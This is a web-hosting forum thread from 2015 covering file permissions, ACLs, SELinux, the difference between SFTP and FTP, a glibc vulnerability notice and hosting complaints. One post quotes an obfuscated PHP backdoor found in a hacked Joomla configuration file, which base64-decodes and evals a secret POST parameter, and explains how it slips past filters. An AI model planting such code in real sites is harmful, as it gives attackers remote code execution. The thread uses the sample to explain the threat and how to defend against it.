Register a SA Forums Account here!
JOINING THE SA FORUMS WILL REMOVE THIS BIG AD, THE ANNOYING UNDERLINED ADS, AND STUPID INTERSTITIAL ADS!!!

You can: log in, read the tech support FAQ, or request your lost password. This dumb message (and those ads) will appear on every screen until you register! Get rid of this crap by registering your own SA Forums Account and joining roughly 150,000 Goons, for the one-time price of $9.95! We charge money because it costs us money per month for bills, and since we don't believe in showing ads to our users, we try to make the money back through forum registrations.

Jigoku
Apr 5, 2009

You're absolutely right. We're increasing our online presence without having anyone on-staff to manage it or make sure we are protected. As an organization with an online shop, we are also being extremely irresponsible with customer data. Thanks so much for all of the advice you have given me so far.

Adbot
ADBOT LOVES YOU

Bob Morales
Aug 18, 2006

Just wear the fucking mask, Bob

I don't care how many people I probably infected with COVID-19 while refusing to wear a mask, my comfort is far more important than the health and safety of everyone around me!

Just spun up a vm on vultr, it's way, way faster than my digital ocean node, even taking into account 512mb vs 768mb

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

Skywalker OG posted:

You're absolutely right. We're increasing our online presence without having anyone on-staff to manage it or make sure we are protected. As an organization with an online shop, we are also being extremely irresponsible with customer data. Thanks so much for all of the advice you have given me so far.

Just to give you an idea of the sophistication now, this is a client's configuration file modified by a hacker that I came across today via feedback loop:

php:
<?php
$sF="PCT4BA6ODSE_";
$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].
     $sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].
     $sF[7].$sF[8].$sF[10]);
$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);
if (isset(${$s20}['n88b749'])) { 
eval($s21(${$s20}['n88b749']));}?><?php
class JConfig {
    public $offline '0';
    public $offline_message 'This site is down for ma
So you've got a Joomla! configuration, along with obfuscated code. Most of this is automated now: scramble some chars, create a function out of it to bypass simple mod_security detection, and when you have the right key base64 decode + eval the command, letting all hell break loose. It's slipped into the affected file. So long as $_POST['n88b749'] isn't set, the page appears "safe".

Typically it's one line, but I had to break it into a few lines to make it play nice with the forums.

The only reason why this happened is because the file is permitted alteration, by the web server user, by its permissions (client got lazy and applied 777 to all files). If the file had permissions 755, and a different owner than that under which the web server runs, then the web server could have read it, but not modified it. With Hostgator and other EIG brands, you lose this added security, because the attack happens under the same user as the rest of your files. Unless you enumerate every file and scan for anomalous changes (like this), then there's no guarantee your frontend software is safe.

:words:

nem fucked around with this message at 09:51 on Jan 19, 2015

Thalagyrt
Aug 10, 2006

That garbage is why I will always maintain that CGI based applications are terrible and need to go away. Yes, that means PHP in its entirety needs to go away. CGI is fundamentally flawed in this context. It should never be possible to execute a goddamn image, or arbitrary user-uploaded file. It's meant for quick and dirty scripts to be executable in a web directory, not for building entire applications. People should really start using real toolkits and running actual application servers instead of trying to shoehorn big applications into CGI. There's simply too many potential entry points to code execution with the CGI model, and nearly every case of someone's site getting owned can be traced back to some script being executed that shouldn't have been executed directly, but was able to be executed because CGI, execute all the things!

McGlockenshire
Dec 16, 2005

GOLLOCKS!
Sooooooo, CGI is the problem instead of 0777 permissions?

Proper file ownership and permissions go a long, long way towards making even the most stupid vulnerability in anything less likely to exploit the entire machine instead of just the one account.

So many hosts get this wrong that creators of scripts designed for shared hosting often have to actively recommend insecure permissions just to work around file ownership stupidity. It's a self perpetuating problem, no matter what language the offending scripts are written in, no matter how they interface with the rest of the system, CGI, WSGI, PSGI, FastCGI, whatever bullshit Java does, whatever.

Impotence
Nov 8, 2010
Lipstick Apathy

Modern webapps don't even usually have public "files", you configure two virtual hosts, one for static in a /uploads directory that doesn't execute any form of scripting, and every other request pipes into /index.php bootstrapper

nem
Jan 4, 2003

panel.dev

McGlockenshire posted:

Proper file ownership and permissions go a long, long way towards making even the most stupid vulnerability in anything less likely to exploit the entire machine instead of just the one account.

So many hosts get this wrong that creators of scripts designed for shared hosting often have to actively recommend insecure permissions just to work around file ownership stupidity. It's a self perpetuating problem, no matter what language the offending scripts are written in, no matter how they interface with the rest of the system, CGI, WSGI, PSGI, FastCGI, whatever bullshit Java does, whatever.

No, the issue is any system in which the web server or process lifecycle operates under the same user that is privileged with access to the rest of the user's files. CGI/FCGI/FPM whatever wrapper you're using that switches users to process a request is vulnerable. That approach, common among hosting companies, is as insecure as setting permissions to 777. Damage scope is changed (all your files vs all of someone else's).

777 is bad because members of your group can run amok and modify any of your files. 717 works, if you keep 1 user, the web server in the other group, because there are no other members of the other group that can touch your assets.

Sometimes 777 doesn't work because it's a mixed environment of other users. In those cases, you should use run the web server as a separate user and grant write permissions through ACLs to those files which the web server must write/modify, e.g.:
code:
user::rwx
user:apache:---
group::r-x
mask::r-x
other::r-x
File still appears as 755, but with an additional security set.
code:
# sudo -u apache /bin/cat
sudo: unable to execute /bin/cat: Permission denied
For example, when setting up WordPress the best things you can do from a security standpoint are:
  • run the web server under a different uid
  • use manual update mode, plugin your FTP password
  • use setfacl to permit write access by the web server to wp-content/uploads/
  • remove handler support for script/php files under wp-content/uploads/

It's not perfect, but it's pretty close to being so.

cstine
Apr 15, 2004

What's in the box?!?

nem posted:

No, the issue is any system in which the web server or process lifecycle operates under the same user that is privileged with access to the rest of the user's files. CGI/FCGI/FPM whatever wrapper you're using that switches users to process a request is vulnerable. That approach, common among hosting companies, is as insecure as setting permissions to 777. Damage scope is changed (all your files vs all of someone else's).

777 is bad because members of your group can run amok and modify any of your files. 717 works, if you keep 1 user, the web server in the other group, because there are no other members of the other group that can touch your assets.

Sometimes 777 doesn't work because it's a mixed environment of other users. In those cases, you should use run the web server as a separate user and grant write permissions through ACLs to those files which the web server must write/modify, e.g.:
code:
user::rwx
user:apache:---
group::r-x
mask::r-x
other::r-x
File still appears as 755, but with an additional security set.
code:
# sudo -u apache /bin/cat
sudo: unable to execute /bin/cat: Permission denied
For example, when setting up WordPress the best things you can do from a security standpoint are:
  • run the web server under a different uid
  • use setfacl to permit write access by the web server to wp-content/uploads/
  • remove handler support for script/php files under wp-content/uploads/

It's not perfect, but it's pretty close to being so.

Alternately people can stop being scared of it and write proper contexts for selinux and take care of an awful lot of issues right there.

Thalagyrt
Aug 10, 2006

McGlockenshire posted:

Proper filesystem permissions are absolutely important. However, avoiding a system in which your stack will execute arbitrary scripts that get uploaded, instead executing an application server with a single known entry point which speaks HTTP or another protocol designed for this purpose, eliminates a *lot* of problems. You can attain similar stuff with .htaccess hackery, but you shouldn't even have to do that. When your application is an actual program running on the server that speaks to your web server directly, you're not going to have the web server executing some arbitrary script that some kid just managed to get written out in your web root, because the web server is configured in such a way that CGI-style execution is completely disabled. Uploaded files simply cannot get executed, because you're not passing any old script that matches a certain file extension to a script handler.

Now someone would have to somehow write out code into the application itself (which is forbidden by your proper FS permissions), but beyond that, do so in such a way that the application would actually load it. Real application servers don't compile code for every request, so it wouldn't get loaded until the application server restarts - and when using a proper deploy process, you're completely trashing your old web directory and loading a fresh copy every time you deploy, so that code would get blown out at the next deploy and very likely never loaded since you only restart the app server under three conditions: deploys (frequent), reboots (rare), and crashes (rare).

The mere idea of compiling your entire application for every request boggles my mind. Why would anyone ever think that's a good idea? That compile-for-every-request lifecycle lead to this crazy ecosystem of opcode caches to try to alleviate the pain of compiling your site for every request, and those opcode caches have a tendency to get corrupted or otherwise break functionality. Why not just use a sane language and architecture to begin with?

Thalagyrt fucked around with this message at 17:24 on Jan 20, 2015

DarkLotus
Sep 30, 2001

Lithium Hosting
Personal, Reseller & VPS Hosting
30-day no risk Free Trial &
90-days Money Back Guarantee!

tl;dr, php sucks, use anything else
http://www.thalagyrtlovesphp.com/

Thalagyrt
Aug 10, 2006

DarkLotus posted:

:downs:

Unity Gain
Sep 15, 2007

dancing blue

DarkLotus posted:

:golfclap:

Hello Dear,

I am wanting to make Site like Facebook using the PHP. I am offer 15$ You can make the Codes? It will success For sure.

Thalagyrt
Aug 10, 2006

Croc Monster posted:

Hello Dear,

I am wanting to make Site like Facebook using the PHP. I am offer 15$ You can make the Codes? It will success For sure.

Hi yes $25 and I guarantee you get all Codes in 4 hours. Please to be paying with the PayPal. I will kindly await you to revert back ASAP.

Thalagyrt fucked around with this message at 18:29 on Jan 20, 2015

DarkLotus
Sep 30, 2001

Lithium Hosting

Croc Monster posted:

Hello Dear,

Excellent response, thank you for making my day :q:

DarkLotus
Sep 30, 2001

Lithium Hosting

nem posted:

On a multi-user system, you probably don't want to make something world-writeable if your already concerned about it being group-writeable.

nem
Jan 4, 2003

panel.dev

DarkLotus posted:

On a multi-user system, you probably don't want to make something world-writeable if your already concerned about it being group-writeable.

Depends upon setup: as long as every user with access to a particular filesystem slice is part of the group, except for one user, the web user, then 717 works. 1 would be applied to group, 7 to others not matched in the group per discretionary access control implementation. It's a dumbed-down version; ACLs or SELinux are better, albeit more intense, options.

Once you have another user outside that group with the same filesystem visibility, then 717 fails. It requires a combination of jailing and application access restrictions to properly implement.

\/ - ACLs (setfacl command) and SELinux. Setup works great on a VPS. Not so much for massive hosting companies without the tweaks as noted above.

nem fucked around with this message at 01:50 on Jan 27, 2015

Rufus Ping
Dec 27, 2006

I'm a Friend of Rodney Nano
That's one hell of a specific, fragile scenario you've just invented and I think people itt would be best advised not to chmod anything to 717 ever because there is almost certainly a better solution

Thalagyrt
Aug 10, 2006

Rufus Ping posted:

That's one hell of a specific, fragile scenario you've just invented and I think people itt would be best advised not to chmod anything to 717 ever because there is almost certainly a better solution

Yeah, this exactly. That's far too prone to screwups for me to ever consider doing. Use ACLs instead.

eightysixed
Sep 23, 2004

I always tell the truth. Even when I lie.

nem posted:

I've not used WordPress in quite sometime, but I remember having to set-up sFTP for a number of clients via the "Dashboard" for plugins/updates and such, and it being a pain in the balls. If you have an open FTP and not utilizing sFTP what's the point? Unless I'm missing something, in which case eightysixed derps all day every day.

nem
Jan 4, 2003

panel.dev

eightysixed posted:

I've not used WordPress in quite sometime, but I remember having to set-up sFTP for a number of clients via the "Dashboard" for plugins/updates and such, and it being a pain in the balls. If you have an open FTP and not utilizing sFTP what's the point? Unless I'm missing something, in which case eightysixed derps all day every day.

Depends, again, on the circumstances. If the FTP hostname isn't "localhost", then the FTP server may reside outside the server and network traffic will pass outside the server onto the network, liable to be sniffed. If the FTP server resides on the same server as WordPress, then use localhost. Traffic won't pass outside the server, unless the server is compromised, and a privileged user is capturing local traffic, if so, then you've got bigger issues on your hands with possible rooting. FTP password in that case will pass on a TCP socket connected locally on the server bypassing switch. SFTP requires ssh as a wrapper, so there's a dependency upon the host to support ssh on the account. I hope in some time that WordPress will integrate Auth TLS support into its built-in FTP client. That solves the issue of encrypting the endpoint without relying on ssh.

If you're going over an insecure, public connection with WordPress, then your wp-admin portal should be secured with SSL. That way not only is your admin password encrypted, but also your FTP credentials.

Using FTP, and running a separate web server, creates a permission partition between what you can access and the web server. It's the same reason we have UAC in Windows :downs:

edit: nuances

nem fucked around with this message at 19:54 on Jan 27, 2015

Thalagyrt
Aug 10, 2006

nem posted:

Depends, again, on the circumstances. If the FTP hostname isn't "localhost", then the FTP server may reside outside the server and network traffic will pass outside the server onto the network, liable to be sniffed. If the FTP server resides on the same server as WordPress, then use localhost. Traffic won't pass outside the server, unless the server is stuck in promiscuous mode and, if so, then you've got bigger issues on your hands with possible rooting. FTP password in that case will pass on a socket connected locally on the server bypassing switch. SFTP requires ssh as a wrapper around the FTP protocol, so there's a dependency upon the host to support ssh on the account. I hope in some time that WordPress will integrate Auth TLS support into its built-in FTP client. That solves the issue of encrypting the endpoint without relying on ssh.

If you're going over an insecure, public connection with WordPress, then your wp-admin portal should be secured with SSL. That way not only is your admin password encrypted, but also your FTP credentials.

Using FTP, and running a separate web server, creates a permission partition between what you can access and the web server. It's the same reason we have UAC in Windows :downs:

SFTP is not SSH wrapped around FTP. SFTP is a completely different protocol that's built into SSH. The only thing it has in common is the name. It's like Java and JavaScript.

Rufus Ping
Dec 27, 2006

also what you said about promiscuous mode is wrong, promisc is just like an inbound mac address filter and has nothing to do with traffic 'escaping'

nem
Jan 4, 2003

panel.dev
/\ - true, sniffing in this case. In either situation, there's someone on the server listening to traffic with elevated privileges.

Thalagyrt posted:

SFTP is not SSH wrapped around FTP. SFTP is a completely different protocol that's built into SSH. The only thing it has in common is the name. It's like Java and JavaScript.

It ships with openssh and on vanilla Linux platforms ties into the sshd PAM provider. Sure, you can separate these two, but going back again to contrived scenarios I don't think most providers will go through the hoops to separate ssh and sftp-server. 90% of those layouts will look like:

code:
root      \_ sshd: sshuser [priv]
sshuser     \_ sshd: sshuser
sshuser        \_ /usr/libexec/openssh/sftp-server
Looking at big box providers like HostGator, it's not provided on shared hosting, and I couldn't imagine it being an option without them explicitly enabling ssh. I assume there are some pure SFTP server implementations out there that don't rely on ssh as a wrapper, but I'm working off what I know and what I encounter in my field :) Auth TLS has a better adoption chance, because it's an extension of common FTP servers like vsftpd, pureftpd, and whatever else is in use.

nem fucked around with this message at 18:55 on Jan 27, 2015

Thalagyrt
Aug 10, 2006

nem posted:

/\ - true, sniffing in this case. In either situation, there's someone on the server listening to traffic with elevated privileges.

It ships with openssh and on vanilla Linux platforms ties into the sshd PAM provider. Sure, you can separate these two, but going back again to contrived scenarios I don't think most providers will go through the hoops to separate ssh and sftp-server. 90% of those layouts will look like:

code:
root      \_ sshd: sshuser [priv]
sshuser     \_ sshd: sshuser
sshuser        \_ /usr/libexec/openssh/sftp-server
Looking at big box providers like HostGator, it's not provided on shared hosting, and I couldn't imagine it being an option without them explicitly enabling ssh. I assume there are some pure SFTP server implementations out there that don't rely on ssh as a wrapper, but I'm working off what I know and what I encounter in my field :) Auth TLS has a better adoption chance, because it's an extension of common FTP servers like vsftpd, pureftpd, and whatever else is in use.

I was specifically addressing this:

quote:

SFTP requires ssh as a wrapper around the FTP protocol

which is absolutely incorrect. sftp-server is not in any way shape or form an implementation of the FTP protocol. SFTP and FTP are like Java and JavaScript - similar in name only.

nem
Jan 4, 2003

panel.dev

Thalagyrt posted:

I was specifically addressing this:

which is absolutely incorrect. sftp-server is not in any way shape or form an implementation of the FTP protocol. SFTP and FTP are like Java and JavaScript - similar in name only.

:doh: need coffee

Thalagyrt
Aug 10, 2006

Rufus Ping posted:

also what you said about promiscuous mode is wrong, promisc is just like an inbound mac address filter and has nothing to do with traffic 'escaping'

To add onto this, promiscuous mode also doesn't guarantee that the switch will send all traffic that passes through it to your port. It's really most useful if you're hooked up to a hub (which you're probably not) or if the switch has been configured to mirror all traffic that passes through it to your port, which is most commonly done for IDS type devices or when you're trying to diagnose a connectivity issue.

It definitely doesn't under any circumstances mean "the host is going to send all traffic destined for the local machine out over all ethernet devices". The kernel's network routing simply doesn't work that way. If traffic is destined for an IP address that's bound to a local interface it takes a short circuit path through the network stack and bypasses layer 2 entirely.

Thalagyrt fucked around with this message at 19:49 on Jan 27, 2015

Rufus Ping
Dec 27, 2006

nem posted:

you seem to be confusing promiscuous mode with CAP_NET_RAW or something. The NIC being in promisc mode does not enable anyone on the same box to listen in on your FTP connections, as you seem to be suggesting

Peanut and the Gang
Aug 24, 2009

by exmarx
Being promiscuous makes you more likely to get viruses.

nem
Jan 4, 2003

panel.dev

Rufus Ping posted:

you seem to be confusing promiscuous mode with CAP_NET_RAW or something. The NIC being in promisc mode does not enable anyone on the same box to listen in on your FTP connections, as you seem to be suggesting

Yes, raw traffic capability is a broader, and more suggestive term. Original post has been amended.

Thalagyrt
Aug 10, 2006

Big CVE today affecting versions of glibc < May 2013. It wasn't marked as a security patch back then, so it didn't get backported.

Ubuntu <= 13.04 is impacted, and patches exist for 10.04 and 12.04 LTS. Debian 7 is also impacted, and patches are mainlined. Patches are out for RHEL 5 and 6. RHEL 7 is not impacted. CentOS has not yet released patches, and it's safe to say their downstreams haven't either.

The bug is remote code execution in gethostbyname(), so this is an exploit that could potentially allow an attacker to gain remote code execution by sending you a malicious email, as one example. This patch requires a reboot to ensure that all processes linking glibc get updated. Since init links glibc, you need to restart init, which means a reboot.

I'll post again once CentOS updates have been released.

Unity Gain
Sep 15, 2007

dancing blue
14.04 LTS 4lyfe :smug:

For once I don't have to do anything.

Aeka 2.0
Nov 16, 2000

:ohdear: Have you seen my apex seals? I seem to have lost them.

Dinosaur Gum
What the hell is up with Bounceweb? My wife's website has slowed to a crawl, its a rather light little WP page for her business. Takes about 15 seconds to load even the dashboard is slow, i've disabled plugins to see if that was the issue, nope. I didn't know there was an issue until google adwords stopped our advertising because the site was too slow, 3 months ago. Bounce web keeps telling me that nothing is wrong, but I suspect their cpus are overloaded pieces of poo poo. I also see it is no longer on the goon list. Awesome.

Impotence
Nov 8, 2010
Lipstick Apathy
from what i remember it's always been a lovely "UNLIMITED EVERYTHING PREPAY 10 YEAR DISCOUNT PRICES SHOWN" thing with a user that just registered to post it and not much else

Aeka 2.0
Nov 16, 2000

Dinosaur Gum

Biowarfare posted:

from what i remember it's always been a lovely "UNLIMITED EVERYTHING PREPAY 10 YEAR DISCOUNT PRICES SHOWN" thing with a user that just registered to post it and not much else

guess I'll move it. The bitch is the domain is through them, and I hate dealing with domain transfers.

DarkLotus
Sep 30, 2001

Lithium Hosting

Aeka 2.0 posted:

guess I'll move it. The bitch is the domain is through them, and I hate dealing with domain transfers.

Good luck, BounceWeb does not respond to requests for EPP codes unless something has changed in the last several months...

I've helped plenty of goons get out of there. Not all of them came to Lithium, but I felt like someone needed to help people get away from Bounceweb.
If you have troubles, shoot me a PM and I'll try and work some magic with enom.

Aeka 2.0
Nov 16, 2000

Dinosaur Gum

DarkLotus posted:

Good luck, BounceWeb does not respond to requests for EPP codes unless something has changed in the last several months...

I've helped plenty of goons get out of there. Not all of them came to Lithium, but I felt like someone needed to help people get away from Bounceweb.
If you have troubles, shoot me a PM and I'll try and work some magic with enom.

sending PM.

eightysixed
Sep 23, 2004

I always tell the truth. Even when I lie.
Just in case it hasn't been mentioned in the last few pages:

:siren: PUBLIC SERVICE ANNOUNCEMENT: STAY AWAY FROM BOUNCEWEB! :siren:

SpartanIvy
May 18, 2007
Hair Elf
So I've never worked with anything approaching professional webhosting, but the company I work for needs to start a website that is consumer facing and will be Wordpress based with an ecommerce and user management package.

We're going to be working with some consultants to get the website designed and built, and they recommended one company for webhosting and I feel like it's a total rip off for what is offered but I'm not an expert in these things. I've compared it to fully dedicated hosting options with HostGator, Arvixe, InMotion, and Dreamhost, and their option (which is through a company called Trioptek) is about 30% higher than the next lowest.

Here's their quote for hosting through Trioptek

quote:

Tier 1 Dedicated Virtual Server Environment
-4 Processing Cores (Intel Xeon class Server CPU)
-8GB Memory
-200GB Dedicated High Speed SSD RAID storage
-10Mbps Dedicated Bandwidth (10up/10down)
-Debian Linux OS
-Single Public IP Address
-Fully Managed Hardware Firewall with custom Security Profile
-Fully Managed multi-day backups
-Server Monitoring with Alerts
-Fully Managed OS and Server Support

$550/month + $200 set-up fee

So am I right in feeling like we're being setup to get fleeced here?

e: I'm going to reach out to RackSpace since they're recommended in the OP and get a quote.

SpartanIvy fucked around with this message at 16:49 on Jan 29, 2015

Impotence
Nov 8, 2010
Lipstick Apathy
for that price i'd expect rackspace..
its not bad, but its not good, assuming truly proactive 24/7 sla'd support and full management. 10mbps can be completely exhausted by a single home connection..

Adbot
ADBOT LOVES YOU

Bob Morales
Aug 18, 2006

Just wear the fucking mask, Bob

I don't care how many people I probably infected with COVID-19 while refusing to wear a mask, my comfort is far more important than the health and safety of everyone around me!

SpartanIV posted:

Here's their quote for hosting through Trioptek

So am I right in feeling like we're being setup to get fleeced here?

bahahaha

How many users are you planning on having at one time? We ran 10 interactive Ruby on Rails apps with 25,000 users a day on a system like that.

You could handle wordpress and ecommerce on a 1 or 2 gb linode. How many orders a day? How many visitors?